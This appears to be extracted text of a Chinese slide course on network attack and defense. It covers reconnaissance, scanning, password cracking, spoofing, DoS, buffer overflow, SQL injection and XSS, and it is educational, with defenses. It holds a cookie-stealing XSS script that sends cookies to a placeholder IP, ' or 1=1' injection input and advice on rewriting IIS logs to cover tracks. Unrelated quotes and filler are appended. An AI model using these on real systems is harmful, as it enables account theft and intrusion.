[精选]安全攻防实践课程1187.pptx

上传人:muj****520 文档编号:87115430 上传时间:2023-04-16 格式:PPTX 页数:97 大小:1.42MB
返回 下载 相关 举报
[精选]安全攻防实践课程1187.pptx_第1页
第1页 / 共97页
[精选]安全攻防实践课程1187.pptx_第2页
第2页 / 共97页
点击查看更多>>
资源描述

《[精选]安全攻防实践课程1187.pptx》由会员分享,可在线阅读,更多相关《[精选]安全攻防实践课程1187.pptx(97页珍藏版)》请在得力文库 - 分享文档赚钱的网站上搜索。

1、安全攻防实践安全攻防实践穆显亮课程内容课程内容2安全攻防安全攻防知识体知识体知识域知识域安全攻防基础安全攻防基础网络攻击基本概念术语网络攻击基本概念术语安全漏洞基础安全漏洞基础安全攻防实践安全攻防实践缓冲区溢出原理与实例缓冲区溢出原理与实例攻击目标信息收集攻击目标信息收集密码破解原理与实例密码破解原理与实例拒绝服务攻击原理与实例拒绝服务攻击原理与实例网页脚本攻击原理与实例网页脚本攻击原理与实例欺骗攻击原理与实例欺骗攻击原理与实例安全漏洞检测安全漏洞检测渗透测试基本流程渗透测试基本流程知识子域知识子域信息安全漏洞信息安全漏洞知识域:安全攻防基础知识域:安全攻防基础v知识子域:网络攻击基本概念术语

2、了解网络攻击的基本常识了解黑客攻击的常用术语v知识子域:网络攻击基本流程了解网络攻击的基本步骤了解网络攻击各个阶段常用的攻击手段和工具3网络攻击基本概念及术语网络攻击基本概念及术语v网络攻击的方式主动攻击:扫描、渗透、拒绝服务被动攻击:嗅探、钓鱼v一些术语后门、RootKit0-day提权社会工程学BotNet(僵尸网络)B/S(Browser/Server)4攻击的过程攻击的过程5踩点定位入侵留后门抹去痕迹v信息收集v分析目标v实施攻击v方便再次进入v清理入侵记录踩点踩点-信息收集信息收集6具体见后面介绍v为什么要收集信息获取攻击目标大概信息网络信息主机信息应用部署信息指导下一步攻击行为v信

3、息收集的方式社会工程学媒体(如搜索引擎、广告介绍等)网络工具的探测定位定位-分析目标分析目标v为什么需要分析目标确定收集信息的准确性更准确的判断(例如:index.ycs是java开发,开发人员修改了脚本后缀以迷惑攻击者)攻击方式及工具路径的选择v分析目标的方法扫描漏洞库论坛等交互应用7入侵入侵-多种多样的入侵方式多种多样的入侵方式v针对配置错误的攻击IPC$的攻击v针对应用漏洞的攻击unicodev缓冲区溢出攻击idq缓冲区溢出v电子欺骗攻击ARP欺骗v拒绝服务攻击syn floodv针对弱口令的攻击口令破解v利用服务的漏洞-本地输入法漏洞v利用应用脚本开发的漏洞-SQL注入v利用人的心理-

4、社会工程学攻击v8v后门可以作什么方便下次直接进入监视用户所有行为、隐私完全控制用户主机v后门放置方式如果已经入侵简单!如果尚未入侵手动放置利用系统漏洞,远程植入利用系统漏洞,诱骗执行后门后门-方便下次进入方便下次进入9v特洛伊木马随系统自启动修改注册表服务Ini文件vRootKit设备驱动v脚本后门难以查找v隐藏账号考验管理人员耐心与细心后门后门-方式方式10v改写访问日志例如:IIS访问日志位置%WinDir%System32LogFilesW3SVC1exyymmdd.log改写日志的技巧修改系统日期v删除中间文件v删除创建的用户抹去痕迹抹去痕迹11信息收集与密码破解信息收集与密码破解v

5、知识子域:攻击目标信息收集了解目标系统网络地址、软件版本等信息获取方式了解网络设备、系统软件、应用软件扫描攻击的常用工具v知识子域:密码破解原理与实例了解密码破解技术原理和口令安全基本知识了解密码破解常用工具及密码字典概念12信息收集技术信息收集技术v公开信息的合理利用及分析vIP及域名信息收集v主机及系统信息收集v系统服务信息的收集v系统、服务及应用漏洞信息收集13信息收集技术信息收集技术-公开信息的分析公开信息的分析v公开信息的合理利用和分析-信息后面能反馈出什么?从著名的”照片泄密”案件到“如何用google入侵网站”1964年中国画报封面衣着判断:北纬46度至48度的区域-齐齐哈尔与哈

6、尔滨之间所握手柄的架式-油井的直径钻井与背后油田间的距离和井架密度-储量和产量 因此设计出适合中国大庆的设备,一举中标14信息信息收集技术收集技术-搜索引擎搜索引擎v网站信息举例:某网络提供商在其网站上宣传“特惠服务器租用:RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.XX Web服务器”v搜索引擎Google搜索例:某Web服务器存在致命错误脚本“5sf67.jsp”攻击者可通过搜索引擎查找存在该错误脚本的网站15信息收集技术信息收集技术-域名与域名与IPIP查询查询16v域名与IP信息收集 WhoisWhois是一个标准服务,可以用来查询域

7、名是否被注册以及注册的详细资料 Whois 可以查询到的信息域名所有者域名及IP地址对应信息联系方式域名到期日期域名注册日期域名所使用的 DNS Servers信息收集技术信息收集技术-域名与域名与IPIP查询查询17v域名与IP查询 nslookup 操作系统自带命令,主要是用来查询域名名称和 IP 之间的对应关系v网络状况查询 Ping系统自带命令,测试与远端电脑或网络设备的连接状况v网络路径状况查询 tracert系统自带命令,测试与远端电脑或网络设备之间的路径信息收集技术信息收集技术-系统鉴别系统鉴别v1DNS的hinfo纪录v2Banner grabv3.二进制文件法v4TCP/IP

8、协议栈检测法v5ICMP堆栈指纹技术18系统鉴别系统鉴别-DNS-DNS的的hinfohinfo记录记录19系统鉴别系统鉴别-服务旗标检测服务旗标检测v服务旗标检测法 rootpooh#telnet 192.168.1.13 Debian GNU/Linux 2.1 target login:vRedhat:/etc/issue、/etc/vbsd:/etc/motdvSolaris:/etc/motd缺陷:不准确,负责任的管理员一般都修改这个文件20FTP回显信息操作系统回显Web回显信息系统鉴别系统鉴别-二进制文件分析法二进制文件分析法v得到远程系统的一个二进制文件v例如1.web ser

9、ver 目录下产生的core文件2.配置不当的ftp server下的二进制文件利用file、readelf命令等来鉴别21系统鉴别系统鉴别-TCP/IP-TCP/IP协议栈检测法协议栈检测法v其原理是不同厂家的IP协议栈实现之间存在许多细微的差别,通过这些差别就能对目标系统的操作系统加以猜测。主动检测被动检测22系统鉴别系统鉴别-ICMP-ICMP堆栈指纹技术堆栈指纹技术23通过端口扫描确定主机开放的端口,不同的端口对应运行着的不同的网络服务端口测试数据包测试响应数据包信息收集技术信息收集技术-端口扫描端口扫描我知道主机上开放的端口了24端口扫描类型端口扫描类型v常规扫描(tcp conne

10、ct scan)v半打开扫描(tcp syn scan)v隐秘扫描(Stealth Scan)SYN/ACK scan:发送一个SYN/ACK分组,测知防火墙的规则设计。它可确定防火墙是否只是简单的分组过滤(只允许已建立好的连接);还是一个基于状态的防火墙(可执行高级的分组过滤)FIN scan:发送FIN分组,目标系统应给所有关闭着的端口发回一个RST分组,这种技巧通常只工作在基于UNIX的TCP/IP协议上;Xmas scan:这一技巧是往目标端口发送一个FIN、URG、PUSH置位的分组,如果目标端口关闭,则返回一个RST分组;Null scan:发送所有标识位复位的TCP分组;vUDP

11、扫描25端口扫描端口扫描-常规扫描常规扫描26v扫描的方法 TCP Connect Scan主要是利用TCP三次握手(Three-way handshaking)的连接方式來达到扫描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap 做TCP Connect Scan端口扫描端口扫描-半打开扫描半打开扫描27v扫描的方法 TCP SYN Scan沒有完成三次握手如左上图,当主机 A 收到主机 B 的回应后,並不会回传 ACK 数据包给主机 B。vTCP SYN Scan的优缺点优点:由于沒有完成 TCP 三次握手,所以不会在目标主机上留下记录。缺点:需有管理者的权限才可执行T

12、CP SYN Scan(以左上图为例,必需要有主机 A 的管理者权限)。AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap 做TCP SYN Scan端口扫描端口扫描-UDP-UDP扫描扫描28v扫描的方法 UDP Port Scan由扫描主机发出 UDP 数据包给目标主机的 UDP Port,並等待目标主机 Port 送回ICMP Unreachable信息。若收到目标主机Port传回的ICMP Unreachable信息,则表示该 Port 处于关闭的状态。若沒有收到目标主机Port传回的ICMP Unreachable信息,则表示该 Port 可能处于Listen状态。vUD

13、P Port Scan的缺点UDP 协议不可靠可能被防火墙过滤掉使用Nmap 做 udp Scan端口扫描策略端口扫描策略v随机端口扫描v慢扫描v碎片扫描v欺骗扫描v29信息收集技术信息收集技术-漏洞扫描漏洞扫描v根据目标主机开放的不同应用和服务来扫描和判断是否存在或可能存在某些漏洞v意义进行网络安全评估为网络系统的加固提供先期准备被网络攻击者加以利用来获取重要的数据信息30对一个信息系统来说,它的安全性不在于它是否对一个信息系统来说,它的安全性不在于它是否采用了最新的加密算法或最先进的设备,而是由系统采用了最新的加密算法或最先进的设备,而是由系统本身最薄弱之处,即漏洞所决定的。只要这个漏洞被

14、本身最薄弱之处,即漏洞所决定的。只要这个漏洞被发现,系统就有可能成为网络攻击的牺牲品。发现,系统就有可能成为网络攻击的牺牲品。信息安全的信息安全的“木桶理论木桶理论”31信息收集技术信息收集技术-漏洞扫描工具漏洞扫描工具v网络设备漏洞扫描器Cisco Auditing Toolsv集成化的漏洞扫描器NessusShadow Security Scanner eEye的Retina Internet Security ScannerGFI LANguard v专业web扫描软件IBM appscanAcunetix Web Vulnerabilityv数据库漏洞扫描器ISS Database S

15、canneroscanner Oracle数据库扫描器Metacoretex 数据安全审计工具工具介绍工具介绍-端口扫描端口扫描vNmap简介被称为“扫描器之王”有for Unix和for Win的两种版本需要Libpcap库和Winpcap库的支持能够进行普通扫描、各种高级扫描和操作系统类型鉴别等使用-sS:半开式扫描 -sT:普通connect()扫描-sU:udp端口扫描-O:操作系统鉴别-P0:强行扫描(无论是否能够ping通目标)-p:指定端口范围-v:详细模式32工具介绍工具介绍-端口扫描端口扫描vSuperScan简介基于Windows平台速度快,图形化界面使用傻瓜化33工具介绍

16、工具介绍-漏洞扫描漏洞扫描vNessus构架服务器端:基于Unix系统客户端:有GTK、Java和Win系统支持运作客户端连接服务器端,并下载插件和扫描策略真正的扫描由服务器端发起两者之间的通信通过加密认证优势:具有强大的插件功能完全免费,升级快速非常适合作为网络安全评估工具34工具介绍工具介绍-漏洞扫描漏洞扫描vX-Scan国产自主开发完全免费比较古老,缺乏维护35工具介绍工具介绍-web-web安全扫描安全扫描vIBM AppScan36Acunetix Web Vulnerability ScannerAcunetix Web Vulnerability Scannerv优秀的Web安全

17、测试软件37密码破解密码破解-利用人性懒惰利用人性懒惰38v密码破解方法密码穷举暴力破解v密码工具密码暴力破解工具密码字典生成工具 密码破解密码破解-密码穷举密码穷举39密码明文对明文密码进行加密对比密文更换密码明文v已知密码加密算法及密文情况下的破解方法ID:cisp psw:123456Ok,you can login inID:cisp psw:No,you can not login in1 12123123412345123456OK,you can login inNo,you can not login inNo,you can not login inNo,you can no

18、t login inNo,you can not login in密码破解密码破解-口令暴力猜解口令暴力猜解40破解工具破解工具vJohn the RippervL0Phtcrackv41v根据用户规则快速生成各类密码字典提高密码破解效率密码破解知识的具体体现v攻击者常用的工具v字典生成器字典生成器42v系统及应用安全策略对抗密码限制密码尝试次数限制必须提供安全的密码密码有效期等v好的密码特征自己容易记住,别人不好猜v密密码破解安全防御码破解安全防御43欺骗攻击与拒绝服务攻击欺骗攻击与拒绝服务攻击44v知识子域:欺骗攻击原理与实例理解IP欺骗、ARP欺骗、DNS欺骗的原理和危害了解防范欺骗攻击

19、的基本方法v知识子域:拒绝服务工具原理与实例理解SYN Flood、UDP Flood、Land攻击、TearDrop攻击等典型DoS攻击的原理及危害理解DDoS攻击的原理了解防范DoS/DDoS攻击的基本方法欺骗攻击定义欺骗攻击定义BACHello,Im B!欺骗攻击(Spoofing)是指通过伪造源于可信任地址的数据包以使一台机器认证另一台机器的复杂技术 45欺骗攻击的主要方式欺骗攻击的主要方式vIP欺骗(IP Spoof)vDNS欺骗vARP欺骗vTCP会话劫持v路由欺骗v46客户服务器Syn send连接请求回应(ISN)Syn+ack确认(ISN+1)会话过程47IPIP欺骗基础知识

20、欺骗基础知识-三次握手三次握手IPIP欺骗实现欺骗实现步骤步骤IP欺骗攻击方法中包括了一系列攻击步骤确认攻击目标使要冒充主机无法响应目标主机猜正确的序数冒充受信主机进行会话48IPIP欺骗实例欺骗实例讲解讲解BAC同步flood攻击 连接请求伪造B进行系列会话A的序数规则49防止防止IPIP欺骗欺骗50v严格设置路由策略:拒绝来自网上,且声明源于本地地址的包v使用最新的系统和软件,避免会话序号被猜出v使用抗IP欺骗功能的产品v严密监视网络,对攻击进行报警ARPARP欺骗基础欺骗基础-Arp-Arp协议工作过程协议工作过程bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:

21、aa:aa192.168.1.1192.168.1.2Whos IP is 192.168.1.1Whos IP is 192.168.1.aMAC aa:aa:aa:aa:is 192.168.1.1I see,I will cache192.168.1.351ARPARP欺骗实现欺骗实现bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aa192.168.1.1192.168.1.2MAC cc:cc:cc:cc:cc is 192.168.1.1I see,I will cache192.168.1.3MAC df:df:df:df:df is 192.16

22、8.1.2I couldnt find 192.168.1.252Internet地址 物理地址192.168.1.1 cc:cc:cc:cc:ccARPARP欺骗防御欺骗防御53v使用静态ARP缓存vIP 与MAC地址绑定vARP防御工具DNSDNS欺骗基础欺骗基础-DNS-DNS协议工作过程协议工作过程其他DNS1.1.1.1I will cacheI dont know,I will ask other1.1.1.1 Its in my cache1.1.1.154DNS服务器客户机客户机DNS服务器DNSDNS欺骗实现欺骗实现I dont know,I will ask otherOt

23、her DNSI will cacheIts in my cache55攻击者DNS服务器DNS服务器客户机DNSDNS欺骗防御欺骗防御56v安装最新版本的DNS软件v安全设置对抗DNS欺骗关闭DNS服务递归功能限制域名服务器作出响应的地址限制域名服务器作出响应的递归请求地址限制发出请求的地址其他欺骗攻击其他欺骗攻击-路由路由欺骗欺骗vICMP重定向报文欺骗vRIP路由欺骗 v源径路由欺骗 57拒绝服务攻击定义拒绝服务攻击定义v拒绝服务式攻击(Denial of Service),顾名思义就是让被攻击的系统无法正常进行服务的攻击方式。v拒绝服务攻击方式利用大量数据挤占网络带宽利用大量请求消耗系

24、统性能利用协议实现缺陷利用系统处理方式缺陷58典型的拒绝服务攻击方式典型的拒绝服务攻击方式vSYN FloodvUDP FloodvTeardropvLANDvSmurfv59(syn)Hello,Im here(syn+ack)Im ready?Im waitingSYN FloodSYN Flood(syn)Hello,Im here?Im waiting(syn)Hello,Im hereIm waitingIm waitingIm waitingUDP FLOODUDP FLOODvUDP Flood 1)大量UDP小包冲击应用服务器(DNS、Radius认证等)2)利用系统服务形成流

25、量(Echo chargen)3)利用正常UDP服务发送大流量形成网络拥塞61LANDLAND攻击攻击 运用IP Spoofing技术送出一连串SYN数据包给目标主机,让目标主机系统误以为这些数据包是由自己发送的。由于目标主机在处理这些数据包的时候,它自己并无法回应给自己SYN-ACK数据包,因而造成系统当机。6211.11.11.11(SYN)hello,Im 11.11.11.11Syn+AckAckSYNSYN ACKACKPSH 1:1025PSH 1025:2049PSH 2049:3073FINACKPSH 1:1025PSH 1000:2049PSH 2049:3073试图重组时

26、主机崩溃TearDropTearDrop(分片攻击)(分片攻击)63SmurfSmurf攻击攻击黑客伪装受害者IP中间网站目标子网络主机目标子网络主机目标子网络主机攻击信息大量ICMP封包 (Layer3)子网络主机子网络主机子网络主机目标网站大量广播(Layer2)64拒绝服务攻击的危害拒绝服务攻击的危害v消耗带宽v瘫痪服务器DNS网页电子邮件v阻塞网络路由器交换器65DDoSDDoS攻击原理攻击原理66工具介绍工具介绍vTFN2KvTrinoo 673133527665 27444 udpmaster client.主机列表telnet betaalmostdone 攻击指令目标主机nc

27、拒绝服务攻击防御拒绝服务攻击防御v定期扫描v过滤不必要的端口与服务v节点配置防火墙/DDOS设备v过滤IP地址v限制SYN/ICMP流量v检查来源68缓冲区溢出与网页脚本安全缓冲区溢出与网页脚本安全69v知识子域:缓冲区溢出原理与实例理解缓冲区溢出的原理和危害了解防范缓冲区溢出的基本方法v知识子域:网页脚本原理与实例理解SQL注入攻击的原理和危害了解防范SQL注入攻击的基本方法理解跨站脚本攻击的原理和危害了解防范跨站脚本攻击的基本方法缓冲区溢出缓冲区溢出v缓冲区溢出原理v缓冲区溢出简单示例v缓冲区溢出防御70缓冲区溢出缓冲区溢出71 v 原理 缓冲区溢出攻击利用编写不够严谨的程序,通过向程序的

28、缓冲区溢出攻击利用编写不够严谨的程序,通过向程序的缓存区写入超过预定长度的数据,造成缓存的溢出,从而破坏缓存区写入超过预定长度的数据,造成缓存的溢出,从而破坏程序的堆栈,导致程序执行流程的改变。程序的堆栈,导致程序执行流程的改变。v基础知识堆栈寄存器指针 缓冲区溢出基础缓冲区溢出基础-堆栈及指针堆栈及指针v堆栈概念一段连续分配的内存空间v堆栈特点后进先出堆栈生长方向与内存地址方向相反v指针指针是指向内存单元的地址寄存器有限存贮容量的高速存贮部件,它们可用来暂存指令、数据和位址34H12H78H56H0108HESP栈顶堆栈(AL)(AH)34H12H78H56H0106HESP栈顶72栈底栈底

29、简单示例简单示例Buffer.c#include int main()char name8;printf(Please input your name:);gets(name);printf(you name is:%s!,name);return 0;73程序作用:将用户输入的内容打印在屏幕上简单示例简单示例74用户输入内容在8位以内时候,程序正常执行用户输入内容超过8位以后,程序执行产生错误简单示例简单示例由于返回地址已经被覆盖,函数执行返回地址时会将覆盖内容当作返回地址,然后试图执行相应地址的指令,从而产生错误。75当我们全部输入a时,错误指令地址为0 x616161,0 x61是a 的

30、ASCII编码76内存底部 内存顶部 name EBP ret cispcisp 堆栈顶部 堆栈底部堆堆栈情况栈情况 name EBP ret aaaaaaaa aaaa aaaa 由于输入的由于输入的namename超过了定义变量的长度(超过了定义变量的长度(8 8位),堆栈中预计的位置无法容纳,位),堆栈中预计的位置无法容纳,只只好向内存顶部继续写好向内存顶部继续写aa,由,由于堆栈的生长方向与内存的生长方向相反于堆栈的生长方向与内存的生长方向相反,用用户输入的户输入的aa覆盖了堆覆盖了堆栈栈底部底部EBPEBP和和retret。程序在返回时,将。程序在返回时,将EBPEBP中的中的aaa

31、aaaaa的的ASCIIASCII码:码:0 x616161610 x61616161作为返回地作为返回地址,址,试图执试图执行行0 x616161610 x61616161处指令,导致错误,处指令,导致错误,形成一次形成一次堆栈溢堆栈溢出出77缓冲区溢出危害缓冲区溢出危害寻找程序漏洞编制缓冲区溢出程序精确控制跳转地址执行设定的代码获得系统权限或破坏系统危害:如果可精确控制内存跳转地址,就可以执行指定代码,获得权限或破坏系统78缓冲区缓冲区溢溢出其他知识出其他知识v缓冲区溢出分类堆溢出栈溢出vShellcode一段用于溢出并获取权限的代码v缓冲区溢出防御缓冲区溢出防御v编写安全代码最根本的解决

32、方法,对输入数据进行验证v缓冲区不可执行技术使被攻击程序的数据段地址空间不可执行,从而使攻击者不可能执行输入缓冲区的代码v指针完整性检查v数组越界保护79网页脚本安全网页脚本安全v脚本安全的概念vSQL注入原理及危害v跨站脚本原理及危害80概念概念v脚本攻击是针对Web应用的攻击脚本攻击主要是针对动态网站进行的攻击,其原因是在建立动态网页的过程中没有对用户的输入输出进行有效的合法性验证v动态网站交互性:即网页会根据用户的要求和选择而动态改变和响应,将浏览器作为客户端界面自动更新:即无须手动地更新HTML文档,便会自动生成新的页面,可以大大节省工作量因时因人而变:即当不同的时间、不同的人访问同一

33、网址时会产生不同的页面81脚本分类脚本分类v静态脚本HTMLv动态脚本82SQL SQL 注入注入 SQL注入(SQL Injection):程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作操作系统Web应用数据库服务器123调用数据库查询直接调用操作系统命令通过数据库调用操作系统命令83SQLSQL注入基础知识注入基础知识vSQL(Structured Query Language):结构化的查询语言,是关系型数据库通讯的标准语言。v查询:Select stateme

34、nt from table where conditionv删除记录:delete from table where conditionv更新记录:update table set field=value where condtionv添加记录:insert into table field values(values)v常用函数Count()Asc(nchar),unicode(nchar)mid(str,n1,n2),substring(str,n1,n2)84SQLSQL注入简单示例注入简单示例Select*from table where user=admin and pwd=SdfG

35、#345!;adminSdfG#345!85Select*from table where user=admin and pwd=123 or 1=1admin123 or 1=1由于密码的输入方式,使得查询语句返回值永远为True,因此通过验证SQLSQL注入范例注入范例-收集信息收集信息86http:/xx.xxx.xx.xx/playnews.asp?id=772and 1=1Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14 MicrosoftODBC Microsoft Access Driver 字符串的语法错误 在查询表达

36、式 id=772 中。/displaynews.asp,行31 说明:数据库为Access 程序没有对于id进行过滤 数据库表中有个字段名为idSQLSQL注入范例操作数据库注入范例操作数据库87SQLSQL注入范例执行系统命令注入范例执行系统命令8889SQLSQL注入防御注入防御v 开发时过滤特殊字符:单引号、双引号、斜杠、反斜杠、冒号、空字符等的字符v过滤的对象:用户的输入提交的URL请求中的参数部分从cookie中得到的数据v部署防SQL注入系统或脚本跨站脚本跨站脚本v定义跨站脚本(CSS-Cross Site Scripting)在远程Web页面的HTML代码中插入的具有恶意目的的数

37、据,用户认为该页面是可信的,但是当浏览器下载该页面时,嵌入其中的脚本将被解释执行v跨站脚本成因CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。这种攻击利用的是用户和服务器之间的信任关系,以及Web站点没有使用有效的输入输出验证来拒绝嵌入的脚本。90跨站脚本危害跨站脚本危害v1 获取其他用户Cookie中的敏感数据 v2 屏蔽页面特定信息 v3 伪造页面信息 v4 拒绝服务攻击 v5 突破外网内网不同安全设置 v6 与其它漏洞结合v7 其它 91跨站脚本范例跨站脚本范例-执行执行JavascriptJavascriptv有很多种方式可造成Javascript的执行,以下举例两种v最

38、原始的范例如下:v第二种方式,利用expression指令来造成javascript执行,范例如下:92body background-image:url(javascript:alert(XSS);body background-image:expression(alert(XSS);跨站脚本危害范例跨站脚本危害范例-Cookies-Cookies窃取窃取93Web服务器URL大小为0的iframe将字符编码传送var code;var target=http:/192.168.1.1/?;info=escape(document.cookie);target=target+info;cod

39、e=;document.write(code);跨站脚本危害跨站脚本危害-窃取窃取CookiesCookiesv更改Cookies成功获取身份94小小结结v脚本攻击从本质上是一种过滤不足造成的攻击v脚本是不需要编译的程序代码,依赖脚本引擎来解释执行,具有很好的操作系统适应性和可移植性v如果不可信的内容被引入到动态页面中,则无论是网站还是客户机都没有足够的信息识别这种情况的发生并采取保护措施v脚本攻击方法主要包括:SQL注入攻击、命令注入、跨站脚本攻击等95谢谢,请提问题!谢谢,请提问题!9、静夜四无邻,荒居旧业贫。3月-233月-23Friday,March 17,202310、雨中黄叶树,灯

40、下白头人。10:30:3110:30:3110:303/17/2023 10:30:31 AM11、以我独沈久,愧君相见频。3月-2310:30:3110:30Mar-2317-Mar-2312、故人江海别,几度隔山川。10:30:3110:30:3110:30Friday,March 17,202313、乍见翻疑梦,相悲各问年。3月-233月-2310:30:3110:30:31March 17,202314、他乡生白发,旧国见青山。17 三月 202310:30:31 上午10:30:313月-2315、比不了得就不比,得不到的就不要。三月 2310:30 上午3月-2310:30Marc

41、h 17,202316、行动出成果,工作出财富。2023/3/17 10:30:3110:30:3117 March 202317、做前,能够环视四周;做时,你只能或者最好沿着以脚为起点的射线向前。10:30:31 上午10:30 上午10:30:313月-239、没有失败,只有暂时停止成功!。3月-233月-23Friday,March 17,202310、很多事情努力了未必有结果,但是不努力却什么改变也没有。10:30:3110:30:3110:303/17/2023 10:30:31 AM11、成功就是日复一日那一点点小小努力的积累。3月-2310:30:3110:30Mar-2317-

42、Mar-2312、世间成事,不求其绝对圆满,留一份不足,可得无限完美。10:30:3110:30:3110:30Friday,March 17,202313、不知香积寺,数里入云峰。3月-233月-2310:30:3110:30:31March 17,202314、意志坚强的人能把世界放在手中像泥块一样任意揉捏。17 三月 202310:30:31 上午10:30:313月-2315、楚塞三湘接,荆门九派通。三月 2310:30 上午3月-2310:30March 17,202316、少年十五二十时,步行夺得胡马骑。2023/3/17 10:30:3110:30:3117 March 2023

43、17、空山新雨后,天气晚来秋。10:30:31 上午10:30 上午10:30:313月-239、杨柳散和风,青山澹吾虑。3月-233月-23Friday,March 17,202310、阅读一切好书如同和过去最杰出的人谈话。10:30:3110:30:3110:303/17/2023 10:30:31 AM11、越是没有本领的就越加自命不凡。3月-2310:30:3110:30Mar-2317-Mar-2312、越是无能的人,越喜欢挑剔别人的错儿。10:30:3110:30:3110:30Friday,March 17,202313、知人者智,自知者明。胜人者有力,自胜者强。3月-233月-

44、2310:30:3110:30:31March 17,202314、意志坚强的人能把世界放在手中像泥块一样任意揉捏。17 三月 202310:30:31 上午10:30:313月-2315、最具挑战性的挑战莫过于提升自我。三月 2310:30 上午3月-2310:30March 17,202316、业余生活要有意义,不要越轨。2023/3/17 10:30:3110:30:3117 March 202317、一个人即使已登上顶峰,也仍要自强不息。10:30:31 上午10:30 上午10:30:313月-23MOMODA POWERPOINTLorem ipsum dolor sit amet,consectetur adipiscing elit.Fusce id urna blandit,eleifend nulla ac,fringilla purus.Nulla iaculis tempor felis ut cursus.感感 谢谢 您您 的的 下下 载载 观观 看看专家告诉

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 考试试题 > 一级建造

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知得利文库网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号-8 |  经营许可证:黑B2-20190332号 |   黑公网安备:91230400333293403D

© 2020-2023 www.deliwenku.com 得利文库. All Rights Reserved 黑龙江转换宝科技有限公司 

黑龙江省互联网违法和不良信息举报
举报电话:0468-3380021 邮箱:hgswwxb@163.com